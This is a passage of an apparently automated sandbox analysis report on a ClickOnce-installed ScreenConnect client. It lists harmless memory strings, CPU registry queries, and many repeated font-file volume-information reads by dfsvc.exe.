                Source: ScreenConnect.WindowsClient.exe, 0000000F.00000000.3138042328.0000000000502000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                Source: ScreenConnect.WindowsClient.exe, 0000000F.00000000.3138042328.0000000000502000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaCode.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaCode.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaCode.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaCode.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaMono.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaMono.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaMono.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaMonoItalic.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaMonoItalic.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaMonoItalic.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaMono.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaMonoItalic.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaMonoItalic.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SansSerifCollection.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SegUIVar.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaVF.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaVF.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaVF-Italic.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaVF.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
